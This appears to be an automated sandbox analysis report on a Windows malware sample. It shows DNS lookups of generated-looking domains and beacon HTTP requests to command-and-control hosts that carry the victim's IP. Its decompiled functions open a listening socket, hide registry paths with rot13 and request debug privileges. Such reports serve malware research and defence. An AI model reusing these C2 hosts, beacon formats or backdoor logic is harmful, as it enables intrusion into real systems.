Jul 17, 2022 08:24:18.209969997 CEST	53	50061	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:20.129586935 CEST	60612	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:20.153884888 CEST	53	60612	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:20.216279030 CEST	58816	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:20.238306046 CEST	53	58816	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:20.339762926 CEST	56437	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:20.363714933 CEST	53	56437	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:21.230097055 CEST	64825	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:21.254204035 CEST	53	64825	8.8.8.8	192.168.2.4
Jul 17, 2022 08:24:21.374412060 CEST	53989	53	192.168.2.4	8.8.8.8
Jul 17, 2022 08:24:21.396162987 CEST	53	53989	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 17, 2022 08:24:14.565578938 CEST	192.168.2.4	8.8.8.8	0x86a9	Standard query (0)	spmhaasaen.biz	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.449079990 CEST	192.168.2.4	8.8.8.8	0x795b	Standard query (0)	pnhrphrsws.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.482076883 CEST	192.168.2.4	8.8.8.8	0xf6e1	Standard query (0)	mwphqrqpsa.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.607815981 CEST	192.168.2.4	8.8.8.8	0x95e0	Standard query (0)	reepsrepnh.org	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.658731937 CEST	192.168.2.4	8.8.8.8	0x3831	Standard query (0)	sqeppehhwa.biz	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.691276073 CEST	192.168.2.4	8.8.8.8	0x6327	Standard query (0)	rqwapnshss.org	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.730096102 CEST	192.168.2.4	8.8.8.8	0x734a	Standard query (0)	hraqsaqsqh.net	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.879152060 CEST	192.168.2.4	8.8.8.8	0x9630	Standard query (0)	npehhsmnsa.us	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:16.726676941 CEST	192.168.2.4	8.8.8.8	0x4ef3	Standard query (0)	weswpsqess.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:16.800127983 CEST	192.168.2.4	8.8.8.8	0x6a69	Standard query (0)	apaqseasqs.com	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:16.941122055 CEST	192.168.2.4	8.8.8.8	0x57b8	Standard query (0)	mesnqrmmwn.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.015161037 CEST	192.168.2.4	8.8.8.8	0xeb04	Standard query (0)	aeaqnmehen.com	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.094142914 CEST	192.168.2.4	8.8.8.8	0xb5ec	Standard query (0)	mprnamhpnn.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.121287107 CEST	192.168.2.4	8.8.8.8	0xf3d9	Standard query (0)	qwphqwsspa.info	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.164396048 CEST	192.168.2.4	8.8.8.8	0x9e57	Standard query (0)	wnnrshhwns.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.190717936 CEST	192.168.2.4	8.8.8.8	0xebae	Standard query (0)	naearnqmas.us	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.215923071 CEST	192.168.2.4	8.8.8.8	0x13da	Standard query (0)	hwsamwmwph.net	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.720094919 CEST	192.168.2.4	8.8.8.8	0x614f	Standard query (0)	qhmawaqhrs.info	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.767482042 CEST	192.168.2.4	8.8.8.8	0x995d	Standard query (0)	ehmpeseeaa.ws	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:18.183559895 CEST	192.168.2.4	8.8.8.8	0x3868	Standard query (0)	qaepmnrnma.info	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:20.129586935 CEST	192.168.2.4	8.8.8.8	0x7515	Standard query (0)	mnerhqmqes.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:20.216279030 CEST	192.168.2.4	8.8.8.8	0x91a7	Standard query (0)	pawsnqwmph.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:20.339762926 CEST	192.168.2.4	8.8.8.8	0x7769	Standard query (0)	sersepwrnr.biz	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:21.230097055 CEST	192.168.2.4	8.8.8.8	0x3a3	Standard query (0)	peeahprsqs.in	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:21.374412060 CEST	192.168.2.4	8.8.8.8	0x85ad	Standard query (0)	wmsqhqawsh.in	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 17, 2022 08:24:14.675084114 CEST	8.8.8.8	192.168.2.4	0x86a9	No error (0)	spmhaasaen.biz		206.191.152.37	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.470220089 CEST	8.8.8.8	192.168.2.4	0x795b	Name error (3)	pnhrphrsws.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.501424074 CEST	8.8.8.8	192.168.2.4	0xf6e1	Name error (3)	mwphqrqpsa.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.636457920 CEST	8.8.8.8	192.168.2.4	0x95e0	Name error (3)	reepsrepnh.org	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.680419922 CEST	8.8.8.8	192.168.2.4	0x3831	Name error (3)	sqeppehhwa.biz	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.720290899 CEST	8.8.8.8	192.168.2.4	0x6327	Name error (3)	rqwapnshss.org	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.780421972 CEST	8.8.8.8	192.168.2.4	0x734a	Name error (3)	hraqsaqsqh.net	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:15.900845051 CEST	8.8.8.8	192.168.2.4	0x9630	Name error (3)	npehhsmnsa.us	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:16.748385906 CEST	8.8.8.8	192.168.2.4	0x4ef3	Name error (3)	weswpsqess.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:16.827198982 CEST	8.8.8.8	192.168.2.4	0x6a69	Name error (3)	apaqseasqs.com	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:16.961141109 CEST	8.8.8.8	192.168.2.4	0x57b8	Name error (3)	mesnqrmmwn.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.050703049 CEST	8.8.8.8	192.168.2.4	0xeb04	Name error (3)	aeaqnmehen.com	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.115701914 CEST	8.8.8.8	192.168.2.4	0xb5ec	Name error (3)	mprnamhpnn.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.149889946 CEST	8.8.8.8	192.168.2.4	0xf3d9	Name error (3)	qwphqwsspa.info	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.185517073 CEST	8.8.8.8	192.168.2.4	0x9e57	Name error (3)	wnnrshhwns.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.210046053 CEST	8.8.8.8	192.168.2.4	0xebae	Name error (3)	naearnqmas.us	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.254570007 CEST	8.8.8.8	192.168.2.4	0x13da	Name error (3)	hwsamwmwph.net	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.745635033 CEST	8.8.8.8	192.168.2.4	0x614f	Name error (3)	qhmawaqhrs.info	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:17.787781954 CEST	8.8.8.8	192.168.2.4	0x995d	No error (0)	ehmpeseeaa.ws		64.70.19.203	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:18.209969997 CEST	8.8.8.8	192.168.2.4	0x3868	Name error (3)	qaepmnrnma.info	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:20.153884888 CEST	8.8.8.8	192.168.2.4	0x7515	Name error (3)	mnerhqmqes.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:20.238306046 CEST	8.8.8.8	192.168.2.4	0x91a7	Name error (3)	pawsnqwmph.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:20.363714933 CEST	8.8.8.8	192.168.2.4	0x7769	Name error (3)	sersepwrnr.biz	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:21.254204035 CEST	8.8.8.8	192.168.2.4	0x3a3	Name error (3)	peeahprsqs.in	none	none	A (IP address)	IN (0x0001)
Jul 17, 2022 08:24:21.396162987 CEST	8.8.8.8	192.168.2.4	0x85ad	Name error (3)	wmsqhqawsh.in	none	none	A (IP address)	IN (0x0001)

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49758	206.191.152.37	80	C:\Windows\SysWOW64\smnss.exe

Timestamp	kBytes transferred	Direction	Data
Jul 17, 2022 08:24:14.946409941 CEST	1138	OUT	GET /imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk HTTP/1.1 Host: spmhaasaen.biz User-Agent: explwer
Jul 17, 2022 08:24:15.189819098 CEST	1138	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 17 Jul 2022 06:24:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=495bb6904f619ecfb157d787a50db5d4\|84.17.52.47\|1658039055\|1658039055\|0\|1\|0; path=/; domain=.spmhaasaen.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=84.17.52.47; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49776	64.70.19.203	80	C:\Windows\SysWOW64\smnss.exe

Timestamp	kBytes transferred	Direction	Data
Jul 17, 2022 08:24:17.965395927 CEST	1142	OUT	GET /imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk HTTP/1.1 Host: ehmpeseeaa.ws User-Agent: explwer

Statistics

High Level Behavior Distribution

Click to dive into process behavior distribution

Disassembly

Reset < >

Analysis Process: EAfIchN1gN.exePID: 3996, Parent PID: 3896COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.5%
Total number of Nodes:	1686
Total number of Limit Nodes:	23

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E10002020() {
				void* _v16;
				char _v156;
				void _v204;
				void _v252;
				void* _v266;
				void _v268;
				char _v668;
				char _v672;
				char _v696;
				int _v700;
				intOrPtr _v704;
				intOrPtr _v712;
				void* _v716;
				void* _v720;
				int _v732;
				char _v736;
				intOrPtr _v740;
				intOrPtr _v752;
				void* __ebx;
				char _t39;
				void* _t42;
				void* _t48;
				void* _t51;
				char* _t56;
				void* _t57;
				char* _t60;
				char* _t61;
				int _t68;
				char _t75;
				void* _t76;
				intOrPtr* _t78;
				void* _t80;
				intOrPtr* _t84;
				intOrPtr* _t85;

				_v672 = 0x10;
				_t39 =  &_v668;
				_v696 = _t39;
				_v700 = 0x202;
				L10003034();
				_t78 = _t76 - 0x2a4;
				_t68 = 0;
				if(_t39 != 0) {
					L10:
					return _t68;
				}
				_v700 = 0;
				_v704 = 1;
				 *_t78 = 2; // executed
				L1000301C(); // executed
				_t80 = _t78 - 0xc;
				_t75 = _t39;
				if(_t39 == 0xffffffff) {
					L9:
					_t68 = 0;
					goto L10;
				}
				asm("cld");
				_t42 = memset( &_v268, 0, 4 << 2);
				_v268 = 2;
				_v720 = 0xc57;
				L1000303C();
				_v266 = _t42;
				asm("cld");
				memset( &_v252, memset( &_v204, 0, 0xa << 2), 0xa << 2);
				_t84 = _t80 + 0xc - 4 + 0x18;
				_v720 = "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba";
				_t60 =  &_v156;
				 *_t84 = _t60;
				E10001F26();
				_v712 = 0x28;
				_v716 =  &_v204;
				_v720 = "usw";
				 *_t84 = _t60; // executed
				_t48 = E10001F57(_t60); // executed
				_t68 = 0;
				if(_t48 == 0) {
					goto L10;
				}
				_v712 = 0x28;
				_v716 =  &_v252;
				_v720 = "pafw";
				 *_t84 =  &_v156; // executed
				_t51 = E10001F57(_t60); // executed
				_t68 = 0;
				if(_t51 == 0) {
					goto L10;
				}
				_v720 =  &_v204;
				 *_t84 = 0x10006054;
				E10001F26();
				_v720 =  &_v252;
				 *_t84 = 0x100060c4;
				E10001F26();
				_v716 = 0x10;
				_t56 =  &_v268;
				_v720 = _t56;
				 *_t84 = _t75; // executed
				L10003044(); // executed
				_t85 = _t84 - 0xc;
				if(_t56 == 0xffffffff) {
					L8:
					_v736 = _t75;
					L10003014();
					goto L9;
				}
				_v732 = 0;
				_v736 = _t75; // executed
				L1000304C(); // executed
				_t85 = _t85 - 8;
				_t61 =  &_v672;
				if(_t56 == 0xffffffff) {
					goto L8;
				}
				L6:
				_v736 = _t61;
				_t57 =  &_v268;
				_v740 = _t57;
				 *_t85 = _t75; // executed
				L10003054(); // executed
				_t85 = _t85 - 0xc;
				if(_t57 != 0xffffffff) {
					_v752 = _t57;
					 *_t85 = E10001C8C;
					E10001180();
				}
				goto L6;
			}

0x1000202c
0x10002036
0x1000203c
0x10002040
0x10002047
0x1000204c
0x1000204f
0x10002056
0x100021fd
0x10002206
0x10002206
0x1000205c
0x10002064
0x1000206c
0x10002073
0x10002078
0x1000207b
0x10002080
0x100021f8
0x100021f8
0x00000000
0x100021f8
0x1000208c
0x10002099
0x1000209b
0x100020a4
0x100020ab
0x100020b3
0x100020c0
0x100020d5
0x100020d5
0x100020d7
0x100020df
0x100020e5
0x100020e8
0x100020ed
0x100020fb
0x100020ff
0x10002107
0x1000210a
0x1000210f
0x10002116
0x00000000
0x00000000
0x1000211c
0x1000212a
0x1000212e
0x1000213c
0x1000213f
0x10002144
0x1000214b
0x00000000
0x00000000
0x10002157
0x1000215b
0x10002162
0x1000216d
0x10002171
0x10002178
0x1000217d
0x10002185
0x1000218b
0x1000218f
0x10002192
0x10002197
0x1000219d
0x100021ed
0x100021ed
0x100021f0
0x00000000
0x100021f5
0x1000219f
0x100021a7
0x100021aa
0x100021af
0x100021b2
0x100021bb
0x00000000
0x00000000
0x100021bd
0x100021bd
0x100021c1
0x100021c7
0x100021cb
0x100021ce
0x100021d3
0x100021d9
0x100021db
0x100021df
0x100021e6
0x100021e6
0x00000000

APIs

WSAStartup.WS2_32 ref: 10002047
socket.WS2_32 ref: 10002073
htons.WS2_32 ref: 100020AB
rot13.SHERVANS ref: 100020E8

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

Get_Reg_SZ.SHERVANS ref: 1000210A

Part of subcall function 10001F57: RegOpenKeyExA.ADVAPI32 ref: 10001F90
Part of subcall function 10001F57: RegOpenKeyExA.ADVAPI32 ref: 10001FBE
Part of subcall function 10001F57: RegQueryValueExA.ADVAPI32 ref: 10001FF9
Part of subcall function 10001F57: RegCloseKey.ADVAPI32 ref: 10002009

Get_Reg_SZ.SHERVANS ref: 1000213F
rot13.SHERVANS ref: 10002162
rot13.SHERVANS ref: 10002178
bind.WSOCK32 ref: 10002192
listen.WS2_32 ref: 100021AA
accept.WS2_32 ref: 100021CE
create_thread.SHERVANS ref: 100021E6
closesocket.WS2_32 ref: 100021F0

Strings

(, xrefs: 1000211C
@P, xrefs: 100020D7

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: rot13$Get_OpenReg_$CloseQueryStartupValueacceptbindclosesocketcreate_threadhtonslistenrot13csocket
String ID: ($@P
API String ID: 4131626927-3767838720
Opcode ID: d78ab5753523488464efac9591bc959a05145e684d76b3ee9f59682df6552bca
Instruction ID: 518850a0735b41474e77e1906edfbaa0d3577d285dae3c11e1d321053acd375c
Opcode Fuzzy Hash: d78ab5753523488464efac9591bc959a05145e684d76b3ee9f59682df6552bca
Instruction Fuzzy Hash: 18418EB48093049AE750EF24C9443EEBBF4EF40390F40CA7DE59887285EB759A889F43

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401150() {
				char _v12;
				char _v16;
				char* _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _t20;
				char _t23;
				intOrPtr* _t25;
				void* _t35;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t39;
				signed int _t40;

				_v44 = E00401000; // executed
				SetUnhandledExceptionFilter(??); // executed
				_t40 = _t39 - 4;
				E0040B000(E0040AF00(_t35, _t36));
				_v12 = 0;
				_v32 =  &_v12;
				_t20 =  *0x40d4e4; // 0xffffffff
				 *_t40 = 0x414004;
				_v36 = _t20;
				_v40 =  &_v16;
				_v44 = 0x414000;
				L0040C1B0();
				_t23 =  *0x418230;
				if(_t23 == 0) {
					L6:
					L0040C1A0();
					_t37 =  *0x40d4e8; // 0x4000
					 *_t23 = _t37;
					E0040AED0(_t23);
					_t40 = _t40 & 0xfffffff0; // executed
					_t25 = E0040AEB0(); // executed
					L0040C190();
					_v40 =  *_t25;
					_v44 =  *0x414000;
					 *_t40 =  *0x414004; // executed
					_t23 = E00404076(_t37); // executed
					L0040C188();
					 *_t40 = _t23; // executed
					ExitProcess(??); // executed
					L7:
					_v40 = _t23;
					_t23 =  *((intOrPtr*)( *0x4194a4 + 0x10));
					_v44 = _t23;
					L0040C1A8();
					_t38 =  *0x4194a4;
					L2:
					if(_t38 != 0xffffffe0) {
						_v40 =  *0x418230;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x30));
						_v44 = _t23;
						L0040C1A8();
						_t38 =  *0x4194a4;
					}
					if(_t38 != 0xffffffc0) {
						_v40 =  *0x418230;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x50));
						_v44 = _t23;
						L0040C1A8();
					}
					goto L6;
				}
				 *0x40d4e8 = _t23;
				_t38 =  *0x4194a4;
				if(_t38 != 0) {
					goto L7;
				}
				goto L2;
			}

0x00401157
0x0040115e
0x00401163
0x0040116b
0x00401170
0x0040117a
0x0040117e
0x00401183
0x0040118a
0x00401191
0x0040119a
0x0040119e
0x004011a3
0x004011aa
0x00401210
0x00401210
0x00401215
0x0040121b
0x0040121d
0x00401222
0x00401225
0x0040122a
0x00401231
0x0040123a
0x00401243
0x00401246
0x0040124d
0x00401252
0x00401255
0x00401260
0x00401260
0x00401269
0x0040126c
0x0040126f
0x00401274
0x004011bf
0x004011c2
0x004011c9
0x004011d2
0x004011d5
0x004011d8
0x004011dd
0x004011dd
0x004011e6
0x004011ed
0x004011f6
0x004011f9
0x004011fc
0x004011fc
0x00000000
0x004011e6
0x004011ac
0x004011b1
0x004011b9
0x00000000
0x00000000
0x00000000

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
__getmainargs.MSVCRT ref: 0040119E
_setmode.MSVCRT ref: 004011D8
_setmode.MSVCRT ref: 004011FC
__p__fmode.MSVCRT ref: 00401210
__p__environ.MSVCRT ref: 0040122A
_cexit.MSVCRT ref: 0040124D
ExitProcess.KERNEL32 ref: 00401255
_setmode.MSVCRT ref: 0040126F

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 3695137517-0
Opcode ID: b4eaf857ed3212c497738ef17982bc4edc5aafd90f9051ff687a4a2c9b8e1448
Instruction ID: fe54e7aefeed6918a5ef1b916f0e819b51a912cea38922c35654569b06e5a2dd
Opcode Fuzzy Hash: b4eaf857ed3212c497738ef17982bc4edc5aafd90f9051ff687a4a2c9b8e1448
Instruction Fuzzy Hash: 8631EDB4908701DFC700EF75D98154E77E5BF88354F008A7EE545AB3A2D73898418B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401149 Relevance: 12.1, APIs: 8, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00401149() {
				char _v12;
				char _v16;
				char* _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _t20;
				char _t23;
				intOrPtr* _t25;
				_Unknown_base(*)()* _t34;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t42;
				signed int _t44;

				_v44 = E00401000; // executed
				SetUnhandledExceptionFilter(_t34); // executed
				_t44 = _t42 - 0x20;
				E0040B000(E0040AF00(_t36, _t37));
				_v12 = 0;
				_v32 =  &_v12;
				_t20 =  *0x40d4e4; // 0xffffffff
				 *_t44 = 0x414004;
				_v36 = _t20;
				_v40 =  &_v16;
				_v44 = 0x414000;
				L0040C1B0();
				_t23 =  *0x418230;
				if(_t23 == 0) {
					L7:
					L0040C1A0();
					_t38 =  *0x40d4e8; // 0x4000
					 *_t23 = _t38;
					E0040AED0(_t23);
					_t44 = _t44 & 0xfffffff0; // executed
					_t25 = E0040AEB0(); // executed
					L0040C190();
					_v40 =  *_t25;
					_v44 =  *0x414000;
					 *_t44 =  *0x414004; // executed
					_t23 = E00404076(_t38); // executed
					L0040C188();
					 *_t44 = _t23; // executed
					ExitProcess(??); // executed
					goto L8;
				} else {
					 *0x40d4e8 = _t23;
					_t39 =  *0x4194a4;
					if(_t39 != 0) {
						L8:
						_v40 = _t23;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x10));
						_v44 = _t23;
						L0040C1A8();
						_t39 =  *0x4194a4;
					}
					if(_t39 != 0xffffffe0) {
						_v40 =  *0x418230;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x30));
						_v44 = _t23;
						L0040C1A8();
						_t39 =  *0x4194a4;
					}
					if(_t39 != 0xffffffc0) {
						_v40 =  *0x418230;
						_t23 =  *((intOrPtr*)( *0x4194a4 + 0x50));
						_v44 = _t23;
						L0040C1A8();
					}
					goto L7;
				}
			}

0x00401157
0x0040115e
0x00401163
0x0040116b
0x00401170
0x0040117a
0x0040117e
0x00401183
0x0040118a
0x00401191
0x0040119a
0x0040119e
0x004011a3
0x004011aa
0x00401210
0x00401210
0x00401215
0x0040121b
0x0040121d
0x00401222
0x00401225
0x0040122a
0x00401231
0x0040123a
0x00401243
0x00401246
0x0040124d
0x00401252
0x00401255
0x00000000
0x004011ac
0x004011ac
0x004011b1
0x004011b9
0x00401260
0x00401260
0x00401269
0x0040126c
0x0040126f
0x00401274
0x00401274
0x004011c2
0x004011c9
0x004011d2
0x004011d5
0x004011d8
0x004011dd
0x004011dd
0x004011e6
0x004011ed
0x004011f6
0x004011f9
0x004011fc
0x004011fc
0x00000000
0x004011e6

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
__getmainargs.MSVCRT ref: 0040119E
_setmode.MSVCRT ref: 004011D8
_setmode.MSVCRT ref: 004011FC
__p__fmode.MSVCRT ref: 00401210
__p__environ.MSVCRT ref: 0040122A
_cexit.MSVCRT ref: 0040124D
ExitProcess.KERNEL32 ref: 00401255
_setmode.MSVCRT ref: 0040126F

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 3695137517-0
Opcode ID: de32d829cb3842ad61717656b7ea68eb81935684880d1ae83627c20b65cc97da
Instruction ID: 7cb89241a2ef958f6d0767399d1a1595bed5fc4071ce6b0a09e50a244a9f3c8c
Opcode Fuzzy Hash: de32d829cb3842ad61717656b7ea68eb81935684880d1ae83627c20b65cc97da
Instruction Fuzzy Hash: CF21FDB4904700DFC700EFB5D98164A7BE5BF88354F008A7EE545AB3A2D738A8418B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404076 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 169
sleeplibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00404076(void* __edx) {
				void* _v16;
				char _v428;
				char _v588;
				char _v748;
				char _v908;
				char _v940;
				char _v944;
				char* _v976;
				int _v980;
				int _v984;
				char* _v988;
				int _v992;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t43;
				void* _t44;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t55;
				char _t58;
				void* _t60;
				intOrPtr _t63;
				char* _t90;
				char* _t91;
				char* _t92;
				char* _t93;
				void* _t96;
				void* _t98;
				char* _t100;
				void* _t101;
				char* _t102;
				void* _t103;
				int* _t106;
				char** _t107;
				char** _t109;
				char** _t112;
				char** _t113;

				_t96 = __edx;
				E0040B320();
				E0040AEB0();
				_v984 =  &_v428;
				_v988 = 2; // executed
				L004086C8(); // executed
				_t106 = (_t103 - 0x000003cc & 0xfffffff0) - 8;
				_t43 = E00404AB8();
				_t114 = _t43;
				if(_t43 != 0) {
					 *_t106 = 0;
					ExitProcess(??); // executed
				}
				_t44 = E004049EA(_t114); // executed
				if(_t44 != 0) {
					 *_t106 = 0;
					ExitProcess(??);
				}
				_t98 =  &_v940;
				asm("cld");
				memset(_t98, 0, 7 << 2);
				_t107 =  &(_t106[3]);
				 *((short*)(_t98 + 7)) = 0;
				_v988 = "user32.dll";
				_v992 = 0x96;
				 *_t107 =  &_v908;
				E00404620();
				_v992 = "fureinaf.qyy";
				_t100 =  &_v940;
				 *_t107 = _t100;
				E00404C38();
				_v988 = _t100;
				_v992 = 0x96;
				_t90 =  &_v588;
				 *_t107 = _t90;
				E00404620();
				 *_t107 = _t90; // executed
				_t51 = E00403F24(); // executed
				_t101 = _t51; // executed
				_t52 = E00403D26(_t90); // executed
				if(_t52 != 0) {
					_t53 = E00403E2E(_t90);
					_t97 = 0;
					__eflags = _t53;
					if(_t53 == 0) {
						_t91 =  &_v588;
						 *_t107 = _t91;
						_t55 = E00404ED6();
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = _t101;
							if(_t101 == 0) {
								 *_t107 =  &_v588;
								LoadLibraryA(??);
								_t107 = _t107 - 4;
							}
							_v992 = "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba";
							_t102 =  &_v748;
							 *_t107 = _t102;
							E00404C38();
							_v992 = "fgngrz";
							_t92 =  &_v940;
							 *_t107 = _t92;
							E00404C38();
							_v992 = _t92;
							 *_t107 = _t102;
							_t58 = E00404812(_t92);
							_v944 = _t58;
							__eflags = _t58 - 1;
							if(_t58 <= 1) {
								_v976 =  &_v944;
								_v980 = 0;
								_v984 = 0;
								_v988 = E00403AE0;
								_v992 = 0;
								 *_t107 = 0;
								CreateThread(??, ??, ??, ??, ??, ??);
								_t107 = _t107 - 0x18;
							}
							 *_t107 = "SeDebugPrivilege";
							E00404DF4();
							 *_t107 = 0x7d0;
